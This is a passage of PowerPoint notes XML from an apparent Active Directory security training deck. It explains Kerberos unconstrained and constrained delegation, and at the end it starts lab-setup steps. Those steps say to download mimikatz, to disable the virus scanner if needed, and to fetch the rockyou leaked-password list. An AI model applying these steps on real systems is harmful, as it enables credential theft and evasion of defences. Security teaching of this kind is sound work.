              <a:t>Thus, with the addition of the constrained delegation extension, Windows Server 2003 supports two modes of delegation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Unconstrained delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Legacy mode of delegation is still supported only if the user has initially entered a user credential to obtain a TGT. This is not any different from the Windows 2000 implementation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Constrained delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Can be enabled for a Kerberos principal when the principal has a TGT that is acquired through the normal process of authenticating to the KDC when:</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A user has initially entered a user credential to obtain a TGT.</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Another service account has obtained a service ticket on behalf of the principal through the protocol transition extension. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>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Constrained delegation is the only delegation mode supported with protocol transition and only works in the boundary of a domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>You can configure a service account to use protocol transition in conjunction with constrained delegation by choosing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Trust this user for delegation to specified services only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Use any authentication protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Delegation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>tab of the account. If these options are selected for a service account, the account can use the protocol transition extension to obtain a service ticket enables it to obtain service tickets to a pre-configured subset of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>kerberized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> services. An additional requirement is that the impersonated user account must not be marked as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Account is sensitive and cannot be delegated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The following sections detail the contents of individual messages in each of the three Kerberos exchanges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE"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116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226628603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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>In the Windows 2000 delegation model, the KDC does not limit the scope of services that a Kerberos principal's identity can be delegated to. That is, after a service account is trusted for delegation, it can request service tickets on behalf of a given user to any other service accounts. This unrestricted way of performing delegation does not provide for an application to specify a subset of service accounts that it deems trustworthy to delegate to. Thus, applications can be exposed to broader impersonation risks.</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Impersonation might span across resource domains that have differing levels of security policy requirements, and some of those security policies might be weaker than the application's security requirements. From the domain administrator's point of view, it is risky to enable unconstrained Kerberos delegation in the enterprise, because there is no way to exclude untrusted servers from participating in delegation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>With constrained delegation, on the other hand, domain administrators can configure service accounts to only delegate to specific sets of service accounts. In Windows Server 2003, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-DS-Allowed-To-Delegate-To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> attribute is added to service accounts to help enforce constrained delegation. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-DS-Allowed-To-Delegate-To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> attribute lists the service principal names (SPNs) of other service accounts that a given service account is allowed to delegate to. When a Windows Server 2003 KDC processes a service ticket request via the constrained delegation extension, it will verify that the target service account is one that is listed in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-DS-Allowed-To-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Delegate-To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> attribute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Thus, with the addition of the constrained delegation extension, Windows Server 2003 supports two modes of delegation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Unconstrained delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Legacy mode of delegation is still supported only if the user has initially entered a user credential to obtain a TGT. This is not any different from the Windows 2000 implementation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Constrained delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Can be enabled for a Kerberos principal when the principal has a TGT that is acquired through the normal process of authenticating to the KDC when:</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A user has initially entered a user credential to obtain a TGT.</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Another service account has obtained a service ticket on behalf of the principal through the protocol transition extension. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>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Constrained delegation is the only delegation mode supported with protocol transition and only works in the boundary of a domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>You can configure a service account to use protocol transition in conjunction with constrained delegation by choosing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Trust this user for delegation to specified services only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Use any authentication protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Delegation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>tab of the account. If these options are selected for a service account, the account can use the protocol transition extension to obtain a service ticket enables it to obtain service tickets to a pre-configured subset of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>kerberized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> services. An additional requirement is that the impersonated user account must not be marked as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Account is sensitive and cannot be delegated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The following sections detail the contents of individual messages in each of the three Kerberos exchanges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE"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117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="247262803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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91195941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119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4229627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Simply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" noProof="0"/>
              <a:t> some references for your reference.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="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174135521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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105384966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121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356256354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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75339145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123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240562796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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301934600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noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104990305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126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171120883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127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427659924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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> &lt;#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>For downloading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> you may need to disable the virus scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> from https://github.com/gentilkiwi/mimikatz/releases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>download password file from https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>download python 2.7.15 x64 MSI from https://www.python.org/downloads/release/python-2715/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>download the </a:t>
            </a:r>
            <a:r>
